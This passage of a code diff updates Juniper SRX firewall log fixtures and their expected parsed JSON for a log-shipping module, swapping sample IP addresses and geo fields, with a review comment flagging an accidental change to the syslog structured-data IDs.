[junos@2636.81.2.69.144.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
+<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.81.2.69.144.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="193.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json
index 3254883ceb93..d09fbdca8826 100644
--- a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json
@@ -142,7 +142,7 @@
 "juniper.srx.threat_severity": "CRITICAL",
 "juniper.srx.type": "idp",
 "log.level": "notification",
- "log.offset": 929,
+ "log.offset": 933,
 "network.protocol": "TCP",
 "observer.egress.interface.name": "reth2.21",
 "observer.egress.zone": "DMZ",
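Review bot: Every changed line in this hunk rewrites the syslog structured-data ID, `[junos@2636.1.1.1.2.28` → `[junos@2636.81.2.69.144.28` (likewise the `.135` and `.35` variants), while no address attribute changes at all; that looks like a file-wide substitution of `1.1.1.2` matching inside the `2636.1.1.1.2.N` SD-ID rather than an intended edit, since that suffix is an enterprise-number OID, not an IP. The same substitution hits the ids.log hunk (`junos@2636.1.1.1.2.137` → `junos@2636.81.2.69.144.137`, and the `.36`, `.40`, `.129` variants), where the `source-address` swap to `81.2.69.144` was presumably the actual goal. The expected-output diffs for idp.log only move `log.offset`, so the pipeline presumably does not key on the SD-ID, but the fixtures no longer reproduce real Junos output and would mask a future parser that does. I'd restore `junos@2636.1.1.1.2.N` in both files and change only the address attributes.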
@@ -231,7 +231,7 @@
 "juniper.srx.tag": "IDP_ATTACK_LOG_EVENT",
 "juniper.srx.threat_severity": "HIGH",
 "log.level": "notification",
- "log.offset": 1857,
+ "log.offset": 1865,
 "network.protocol": "TCP",
 "observer.egress.interface.name": "reth1.1",
 "observer.egress.zone": "dst-sec-zone1-outside",
@@ -316,7 +316,7 @@
 "juniper.srx.tag": "IDP_ATTACK_LOG_EVENT",
 "juniper.srx.threat_severity": "HIGH",
 "log.level": "notification",
- "log.offset": 2773,
+ "log.offset": 2785,
 "network.protocol": "TCP",
 "observer.egress.interface.name": "reth1.1",
 "observer.egress.zone": "dst-sec-zone1-outside",
@@ -382,7 +382,7 @@
 "juniper.srx.service_name": "HTTP",
 "juniper.srx.tag": "IDP_APPDDOS_APP_STATE_EVENT",
 "log.level": "notification",
- "log.offset": 3693,
+ "log.offset": 3709,
 "message": "Connection rate exceeded limit 60",
 "network.protocol": "TCP",
 "observer.egress.interface.name": "reth0.0",
@@ -447,7 +447,7 @@
 "juniper.srx.time_period": "60",
 "juniper.srx.time_scope": "PEER",
 "log.level": "notification",
- "log.offset": 4165,
+ "log.offset": 4185,
 "network.protocol": "TCP",
 "observer.egress.interface.name": "reth0.0",
 "observer.egress.zone": "untrust",
@@ -515,7 +515,7 @@
 "juniper.srx.time_period": "60",
 "juniper.srx.time_scope": "PEER",
 "log.level": "notification",
- "log.offset": 4895,
+ "log.offset": 4919,
 "network.protocol": "TCP",
 "observer.egress.interface.name": "reth0.1",
 "observer.egress.zone": "untrust",
diff --git a/x-pack/filebeat/module/juniper/srx/test/ids.log b/x-pack/filebeat/module/juniper/srx/test/ids.log
index 5b87817da868..21e229c792ab 100644
--- a/x-pack/filebeat/module/juniper/srx/test/ids.log
+++ b/x-pack/filebeat/module/juniper/srx/test/ids.log
@@ -1,12 +1,12 @@
-<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.137 attack-name="TCP sweep!" source-address="113.113.17.17" source-port="6000" destination-address="40.177.177.1" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.36 attack-name="WinNuke attack!" source-address="2000:0000:0000:0000:0000:0000:0000:0002" source-port="3240" destination-address="2001:0000:0000:0000:0000:0000:0000:0002" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="1.1.1.2" source-port="40001" destination-address="2.2.2.2" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.1.1.1.2.40 attack-name="UDP flood!" source-address="111.1.1.3" source-port="40001" destination-address="3.4.2.2" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.1.1.1.2.40 attack-name="ICMP fragment!" source-address="111.1.1.3" destination-address="3.4.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Record Route IP option!" source-address="111.1.1.3" destination-address="3.4.2.2" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 6in6!"
source-address="1212::12" destination-address="1111::11" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 4in4!" source-address="12.12.12.1" destination-address="11.11.11.1" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" destination-address="2.2.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="111.1.1.3" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.137 attack-name="TCP sweep!" source-address="89.160.20.112" source-port="6000" destination-address="40.177.177.1" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.36 attack-name="WinNuke attack!"
source-address="2000:0000:0000:0000:0000:0000:0000:0002" source-port="3240" destination-address="2001:0000:0000:0000:0000:0000:0000:0002" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.40 attack-name="SYN flood!" source-address="81.2.69.144" source-port="40001" destination-address="2.2.2.2" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.81.2.69.144.40 attack-name="UDP flood!" source-address="81.2.69.143" source-port="40001" destination-address="3.4.2.2" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.81.2.69.144.40 attack-name="ICMP fragment!" source-address="81.2.69.143" destination-address="3.4.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.144.40 attack-name="Record Route IP option!" source-address="81.2.69.143" destination-address="3.4.2.2" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.144.40 attack-name="Tunnel GRE 6in6!" source-address="1212::12" destination-address="1111::11" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.144.40 attack-name="Tunnel GRE 4in4!"
source-address="81.2.69.145" destination-address="11.11.11.1" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.81.2.69.144.40 attack-name="SYN flood!" destination-address="2.2.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.81.2.69.144.40 attack-name="SYN flood!" source-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.129 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.129 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json
index b0be8ce71089..86a8f2d10831 100644
--- a/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json
@@ -1,15 +1,8 @@
 [
 {
 "@timestamp": "2018-07-19T21:17:02.309-02:00",
- "client.ip": "113.113.17.17",
+ "client.ip": "89.160.20.112",
 "client.port": 6000,
- "destination.as.number": 4249,
- "destination.as.organization.name": "Eli Lilly and Company",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "40.177.177.1",
 "destination.port": 1433,
 "event.action": "sweep_detected",
@@ -20,7 +13,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "alert",
 "event.module": "juniper",
- "event.original": "attack-name=\"TCP sweep!\" source-address=\"113.113.17.17\" source-port=\"6000\" destination-address=\"40.177.177.1\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"",
+ "event.original": "attack-name=\"TCP sweep!\" source-address=\"89.160.20.112\" source-port=\"6000\" destination-address=\"40.177.177.1\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"",
 "event.outcome": "success",
 "event.severity": 11,
 "event.timezone": "-02:00",
@@ -44,22 +37,23 @@
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
- "113.113.17.17",
- "40.177.177.1"
+ "40.177.177.1",
+ "89.160.20.112"
 ],
 "server.ip": "40.177.177.1",
 "server.port": 1433,
 "service.type": "juniper",
- "source.as.number": 4134,
- "source.as.organization.name": "No.31,Jin-rong Street",
- "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 23.1167,
- "source.geo.location.lon": 113.25,
- "source.geo.region_iso_code": "CN-GD",
- "source.geo.region_name": "Guangdong",
- "source.ip": "113.113.17.17",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112",
 "source.port": 6000,
 "tags": [
 "forwarded",
@@ -96,7 +90,7 @@
 "juniper.srx.process": "RT_IDS",
 "juniper.srx.tag": "RT_SCREEN_TCP",
 "log.level": "error",
- "log.offset": 294,
+ "log.offset": 298,
 "observer.ingress.interface.name": "fe-0/0/2.0",
 "observer.ingress.zone": "untrust",
 "observer.name": "rtr199",
@@ -119,15 +113,8 @@
 },
 {
 "@timestamp": "2018-07-19T21:19:02.309-02:00",
- "client.ip": "1.1.1.2",
+ "client.ip": "81.2.69.144",
 "client.port": 40001,
- "destination.as.number": 3215,
- "destination.as.organization.name": "Orange",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "FR",
- "destination.geo.country_name": "France",
- "destination.geo.location.lat": 48.8582,
- "destination.geo.location.lon": 2.3387,
 "destination.ip": "2.2.2.2",
 "destination.port": 50010,
 "event.action": "flood_detected",
@@ -138,7 +125,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "alert",
 "event.module": "juniper",
- "event.original": "attack-name=\"SYN flood!\" source-address=\"1.1.1.2\" source-port=\"40001\" destination-address=\"2.2.2.2\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
+ "event.original": "attack-name=\"SYN flood!\" source-address=\"81.2.69.144\" source-port=\"40001\" destination-address=\"2.2.2.2\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
 "event.outcome": "success",
 "event.severity": 11,
 "event.timezone": "-02:00",
@@ -154,7 +141,7 @@
 "juniper.srx.process": "RT_IDS",
 "juniper.srx.tag": "RT_SCREEN_TCP",
 "log.level": "error",
- "log.offset": 644,
+ "log.offset": 652,
 "observer.ingress.interface.name": "ge-0/0/1.0",
 "observer.ingress.zone": "trustZone",
 "observer.name": "rtr199",
@@ -162,20 +149,21 @@
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
- "1.1.1.2",
- "2.2.2.2"
+ "2.2.2.2",
+ "81.2.69.144"
 ],
 "server.ip": "2.2.2.2",
 "server.port": 50010,
 "service.type": "juniper",
- "source.as.number": 13335,
- "source.as.organization.name": "Cloudflare, Inc.",
- "source.geo.continent_name": "Oceania",
- "source.geo.country_iso_code": "AU",
- "source.geo.country_name": "Australia",
- "source.geo.location.lat": -33.494,
- "source.geo.location.lon": 143.2104,
- "source.ip": "1.1.1.2",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.144",
 "source.port": 40001,
 "tags": [
 "forwarded",
@@ -184,16 +172,8 @@ }, { "@timestamp": "2018-07-19T21:22:02.309-02:00", - "client.ip": "111.1.1.3", + "client.ip": "81.2.69.143", "client.port": 40001, - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.6348, - "destination.geo.location.lon": -122.3451, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", "destination.ip": "3.4.2.2", "destination.port": 53, "event.action": "flood_detected", @@ -204,7 +184,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "attack-name=\"UDP flood!\" source-address=\"111.1.1.3\" source-port=\"40001\" destination-address=\"3.4.2.2\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", + "event.original": "attack-name=\"UDP flood!\" source-address=\"81.2.69.143\" source-port=\"40001\" destination-address=\"3.4.2.2\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", "event.outcome": "success", "event.severity": 11, "event.timezone": "-02:00", @@ -220,7 +200,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_UDP", "log.level": "error", - "log.offset": 930, + "log.offset": 946, "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", "observer.name": "rtr199", 
@@ -228,23 +208,21 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "111.1.1.3", - "3.4.2.2" + "3.4.2.2", + "81.2.69.143" ], "server.ip": "3.4.2.2", "server.port": 53, "service.type": "juniper", - "source.as.number": 56041, - "source.as.organization.name": "China Mobile communications corporation", - "source.geo.city_name": "Wenzhou", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 27.9983, - "source.geo.location.lon": 120.6666, - "source.geo.region_iso_code": "CN-ZJ", - "source.geo.region_name": "Zhejiang", - "source.ip": "111.1.1.3", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 40001, "tags": [ "forwarded", @@ -253,15 +231,7 @@ }, { "@timestamp": "2018-07-19T21:25:02.309-02:00", - "client.ip": "111.1.1.3", - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.6348, - "destination.geo.location.lon": -122.3451, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", + "client.ip": "81.2.69.143", "destination.ip": "3.4.2.2", "event.action": "fragment_detected", "event.category": [ 
@@ -271,7 +241,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "attack-name=\"ICMP fragment!\" source-address=\"111.1.1.3\" destination-address=\"3.4.2.2\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", + "event.original": "attack-name=\"ICMP fragment!\" source-address=\"81.2.69.143\" destination-address=\"3.4.2.2\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", "event.outcome": "success", "event.severity": 11, "event.timezone": "-02:00", @@ -287,7 +257,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_ICMP", "log.level": "error", - "log.offset": 1215, + "log.offset": 1237, "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", "observer.name": "rtr199", @@ -295,22 +265,20 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "111.1.1.3", - "3.4.2.2" + "3.4.2.2", + "81.2.69.143" ], "server.ip": "3.4.2.2", "service.type": "juniper", - "source.as.number": 56041, - "source.as.organization.name": "China Mobile communications corporation", - "source.geo.city_name": "Wenzhou", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 27.9983, - "source.geo.location.lon": 120.6666, - "source.geo.region_iso_code": "CN-ZJ", - "source.geo.region_name": "Zhejiang", - "source.ip": "111.1.1.3", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded", "juniper.srx" 
@@ -318,15 +286,7 @@ }, { "@timestamp": "2018-07-19T21:26:02.309-02:00", - "client.ip": "111.1.1.3", - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.6348, - "destination.geo.location.lon": -122.3451, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", + "client.ip": "81.2.69.143", "destination.ip": "3.4.2.2", "event.category": [ "intrusion_detection", @@ -335,7 +295,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "attack-name=\"Record Route IP option!\" source-address=\"111.1.1.3\" destination-address=\"3.4.2.2\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", + "event.original": "attack-name=\"Record Route IP option!\" source-address=\"81.2.69.143\" destination-address=\"3.4.2.2\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", "event.outcome": "success", "event.severity": 11, "event.timezone": "-02:00", @@ -351,7 +311,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_IP", "log.level": "error", - "log.offset": 1463, + "log.offset": 1491, "network.iana_number": "1", "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", 
@@ -360,22 +320,20 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "111.1.1.3", - "3.4.2.2" + "3.4.2.2", + "81.2.69.143" ], "server.ip": "3.4.2.2", "service.type": "juniper", - "source.as.number": 56041, - "source.as.organization.name": "China Mobile communications corporation", - "source.geo.city_name": "Wenzhou", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 27.9983, - "source.geo.location.lon": 120.6666, - "source.geo.region_iso_code": "CN-ZJ", - "source.geo.region_name": "Zhejiang", - "source.ip": "111.1.1.3", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded", "juniper.srx" @@ -409,7 +367,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_IP", "log.level": "error", - "log.offset": 1734, + "log.offset": 1768, "network.iana_number": "1", "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", @@ -431,12 +389,7 @@ }, { "@timestamp": "2018-07-19T21:28:02.309-02:00", - "client.ip": "12.12.12.1", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, + "client.ip": "81.2.69.145", "destination.ip": "11.11.11.1", "event.action": "tunneling_screen", "event.category": [ 
@@ -446,7 +399,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "attack-name=\"Tunnel GRE 4in4!\" source-address=\"12.12.12.1\" destination-address=\"11.11.11.1\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", + "event.original": "attack-name=\"Tunnel GRE 4in4!\" source-address=\"81.2.69.145\" destination-address=\"11.11.11.1\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"", "event.outcome": "success", "event.severity": 11, "event.timezone": "-02:00", @@ -462,7 +415,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_IP", "log.level": "error", - "log.offset": 1998, + "log.offset": 2036, "network.iana_number": "1", "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", @@ -472,18 +425,19 @@ "observer.vendor": "Juniper", "related.ip": [ "11.11.11.1", - "12.12.12.1" + "81.2.69.145" ], "server.ip": "11.11.11.1", "service.type": "juniper", - "source.as.number": 32328, - "source.as.organization.name": "Alascom, Inc.", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "12.12.12.1", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "tags": [ "forwarded", "juniper.srx" 
@@ -491,13 +445,6 @@ }, { "@timestamp": "2018-07-19T22:19:02.309-02:00", - "destination.as.number": 3215, - "destination.as.organization.name": "Orange", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "FR", - "destination.geo.country_name": "France", - "destination.geo.location.lat": 48.8582, - "destination.geo.location.lon": 2.3387, "destination.ip": "2.2.2.2", "event.action": "flood_detected", "event.category": [ @@ -523,7 +470,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_TCP_DST_IP", "log.level": "error", - "log.offset": 2266, + "log.offset": 2309, "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", "observer.name": "rtr199", @@ -542,7 +489,7 @@ }, { "@timestamp": "2018-07-19T22:19:02.309-02:00", - "client.ip": "111.1.1.3", + "client.ip": "81.2.69.143", "event.action": "flood_detected", "event.category": [ "intrusion_detection", @@ -551,7 +498,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "attack-name=\"SYN flood!\" source-address=\"111.1.1.3\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"", + "event.original": "attack-name=\"SYN flood!\" source-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"", "event.outcome": "success", "event.severity": 11, "event.timezone": "-02:00", @@ -567,7 +514,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_TCP_SRC_IP", "log.level": "error", - "log.offset": 2503, + "log.offset": 2550, "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trustZone", "observer.name": "rtr199", 
@@ -575,20 +522,18 @@ "observer.type": "firewall", "observer.vendor": "Juniper", "related.ip": [ - "111.1.1.3" + "81.2.69.143" ], "service.type": "juniper", - "source.as.number": 56041, - "source.as.organization.name": "China Mobile communications corporation", - "source.geo.city_name": "Wenzhou", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 27.9983, - "source.geo.location.lon": 120.6666, - "source.geo.region_iso_code": "CN-ZJ", - "source.geo.region_name": "Zhejiang", - "source.ip": "111.1.1.3", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded", "juniper.srx" @@ -624,7 +569,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_TCP", "log.level": "error", - "log.offset": 2737, + "log.offset": 2790, "observer.ingress.interface.name": "ge-0/0/1.0", "observer.ingress.zone": "trust", "observer.name": "rtr199", @@ -675,7 +620,7 @@ "juniper.srx.process": "RT_IDS", "juniper.srx.tag": "RT_SCREEN_TCP", "log.level": "error", - "log.offset": 3028, + "log.offset": 3085, "observer.ingress.interface.name": "ge-0/0/1.0", 